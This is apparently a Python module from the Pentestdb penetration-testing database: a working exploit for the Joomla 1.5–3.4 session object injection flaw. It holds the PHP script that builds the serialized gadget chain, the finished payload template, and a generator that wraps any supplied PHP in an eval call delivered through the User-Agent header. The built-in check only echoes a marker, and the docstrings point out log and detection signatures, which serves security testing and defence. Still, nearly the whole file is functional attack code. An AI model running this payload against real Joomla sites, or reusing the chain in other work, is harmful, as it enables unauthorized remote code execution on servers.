#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
'''attack_payload 生成方法:
<?php
header("Content-Type: text/plain");
class JSimplepieFactory {
}
class JDatabaseDriverMysql {
}
class SimplePie {
var $sanitize;
var $cache;
var $cache_name_function;
var $javascript;
var $feed_url;
function __construct()
{
$this->feed_url = "phpinfo();JFactory::getConfig();exit;";
$this->javascript = 9999;
$this->cache_name_function = "assert";
$this->sanitize = new JDatabaseDriverMysql();
$this->cache = true;
}
}
class JDatabaseDriverMysqli {
protected $a;
protected $disconnectHandlers;
protected $connection;
function __construct()
{
$this->a = new JSimplepieFactory();
$x = new SimplePie();
$this->connection = 1;
$this->disconnectHandlers = array(array($x,"init"));
}
}
$a = new JDatabaseDriverMysqli();
$result = serialize($a);
$result = str_replace(chr(0).'*'.chr(0), '\x5C0\x5C0\x5C0', $result);
echo '}__t|'.$result.'\xF0\x9D\x8C\x86';
?>
'''
class JoomlaSOI(Exploit):
    """Pentestdb exploit module: Joomla 1.5~3.4 session object injection.

    The module's ``description`` (below, kept verbatim in Chinese) states the
    conditions the check relies on: Joomla keeps sessions in the database, the
    ``User-Agent`` / ``X-Forwarded-For`` request headers are stored there
    unfiltered, and a serialized PHP object placed in such a header is
    unserialized on the next ``session_start`` (the author also requires
    PHP < 5.6.13).

    From a defender's point of view the observable artefact is the traffic
    itself: a ``User-Agent`` header that carries PHP serialization syntax
    (the static prefix ``}__test|O:21:"JDatabaseDriverMysqli"`` in
    ``_genPayload``), followed by a second, header-less GET to the same URL.
    Both are visible in web-server / proxy logs and are the natural detection
    point.

    ``self.http`` and ``self.url`` are not defined here; presumably they are
    supplied by the ``Exploit`` base class (not visible in this file).
    """
    expName = u"Joomla 1.5~3.4 session对象注入漏洞exploit"
    version = "1.0"
    author = "alpha1e0"
    language = "php"
    appName = "joomla"
    appVersion = "1.5~3.4"
    reference = ['http://drops.wooyun.org/papers/11330']
    description = u'''
joomla 1.5~3.4 session 对象注入漏洞,成功利用同时需要PHP < 5.6.13。joomla中session存储在数据库中,其中user-agent,
x-forward-for未经过滤存储到数据库中,可在其中插入序列化对象,session_start后自动反序列化触发命令执行
'''

    def _verify(self):
        """Check the target by round-tripping a marker through the session store.

        Two requests are made: the first carries the generated payload in the
        ``User-Agent`` header (the vector named in ``description``); the second
        is a plain GET to the same URL.  The target is reported as vulnerable
        only if that second response contains the marker echoed by ``php_code``.

        Returns:
            Result: with ``result['fullpath']`` and ``result['payload']`` set
            when the marker is found; otherwise returned without those keys.
        """
        result = Result(self)
        # Marker-only probe: the check looks for this literal in the follow-up
        # response, so the same string doubles as a log/IDS signature.
        php_code = '''echo "asdfgh123456";'''
        attack_payload = self._genPayload(php_code)
        # Request 1: the payload travels in the User-Agent header only.
        response = self.http.get(self.url, headers={"User-Agent":attack_payload})
        if response.status_code == 200:
            # Request 2: a plain GET; finding the marker here is taken as
            # evidence that the stored header was deserialized and executed.
            response = self.http.get(self.url)
            # NOTE(review): str-vs-bytes comparison on response.content assumes
            # Python 2 semantics (the u'' literals above point the same way).
            if response.status_code == 200 and 'asdfgh123456' in response.content:
                result['fullpath'] = self.url
                result['payload'] = attack_payload
        return result

    def _genPayload(self, raw_payload):
        """Embed *raw_payload* (PHP source) into the fixed serialized-object template.

        ``template`` is a pre-built PHP ``serialize()`` output (the PHP script
        that generates it is in the module-level string above) with two ``%``
        slots: the length and body of the ``feed_url`` string.  The raw PHP is
        not inserted as-is: each character becomes ``chr(N)``, the pieces are
        joined with ``.`` and wrapped in ``eval(...);``, so the inserted text
        contains no quote characters.

        Args:
            raw_payload: PHP source text to embed.

        Returns:
            str: the complete payload string.
        """
        # Byte-exact serialized form; only %d/%s vary.  The ``\x5C0`` sequences
        # are a literal backslash followed by ``0``, yet the ``s:21``/``s:13``
        # lengths count each as a single byte -- presumably they are expected to
        # reach unserialize() as NUL bytes (protected-property markers) after the
        # storage layer unescapes them; see ``reference``.  The trailing
        # ``\xF0\x9D\x8C\x86`` is a 4-byte UTF-8 sequence whose role in the
        # stored session value is explained in ``reference``, not derivable here.
        template = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%d:"%sJFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
        # chr()-join encoding: PHP concatenates the pieces back into the source text.
        encoded_payload = ".".join(["chr({0})".format(ord(x)) for x in raw_payload])
        encoded_payload = "eval({0});".format(encoded_payload)
        # 27 == len('JFactory::getConfig();exit;'), the fixed suffix of the
        # feed_url string in the template, so s:%d equals the full string length.
        return template % (27+len(encoded_payload), encoded_payload)